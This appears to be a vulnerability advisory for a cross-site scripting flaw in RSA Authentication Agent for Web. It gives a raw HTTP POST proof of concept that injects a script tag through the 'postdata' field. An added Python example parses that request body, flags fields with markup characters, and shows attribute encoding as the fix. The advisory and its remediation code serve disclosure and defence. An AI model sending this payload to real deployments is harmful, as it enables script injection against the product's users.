RSA Security RSA Authentication Agent For Web Remote Cross-Site Scripting Vulnerability
No exploit is required to leverage this issue. The following proof of concept has been made available:

    POST /WebID/IISWebAgentIF.dll HTTP/1.0
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
    Accept-Language: de
    Content-Type: application/x-www-form-urlencoded
    Connection: Keep-Alive
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
    Host: www.example.com
    Cache-Control: no-cache
    Referer: https://www.example.com/
    Content-Length: 135

    stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata="><script>alert("Vulnerable")</script>&authntype=2&username=asdf&passcode=jkl%F6
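The following is an added example, not part of the original advisory and not RSA's code. It parses the request body from the proof of concept, flags the form field that carries markup characters, and contrasts raw reflection into an HTML attribute with attribute-encoded output. That the agent echoes `postdata` into an attribute is an assumption drawn from the `">` prefix in the proof of concept; the function names and the hidden-input markup are hypothetical.

```python
import html
from urllib.parse import parse_qsl

# Request body taken from the proof of concept on this page.
POC_BODY = ('stage=useridandpasscode&referrer=Z2F&sessionid=0'
            '&postdata="><script>alert("Vulnerable")</script>'
            '&authntype=2&username=asdf&passcode=jkl%F6')

# Characters that let a value leave an HTML attribute or open a tag.
MARKUP_CHARS = set('<>"\'')


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body into a dict."""
    # latin-1 so single-byte escapes such as %F6 decode without loss.
    return dict(parse_qsl(body, keep_blank_values=True, encoding='latin-1'))


def suspicious_fields(fields):
    """Return the names of fields whose decoded value contains markup characters."""
    return sorted(k for k, v in fields.items() if MARKUP_CHARS & set(v))


def hidden_input_unsafe(name, value):
    # Hypothetical vulnerable rendering (assumption): value concatenated as-is.
    return '<input type="hidden" name="%s" value="%s">' % (name, value)


def hidden_input_safe(name, value):
    # html.escape(quote=True) encodes & < > " ' so the value cannot close
    # the attribute or start a new element.
    return '<input type="hidden" name="%s" value="%s">' % (
        html.escape(name, quote=True), html.escape(value, quote=True))


if __name__ == '__main__':
    fields = parse_form(POC_BODY)
    print('fields with markup characters:', suspicious_fields(fields))
    print('unsafe:', hidden_input_unsafe('postdata', fields['postdata']))
    print('safe:  ', hidden_input_safe('postdata', fields['postdata']))
```

The field check is a review and logging aid for request bodies; the fix itself is the output encoding applied where the value is written back into the page.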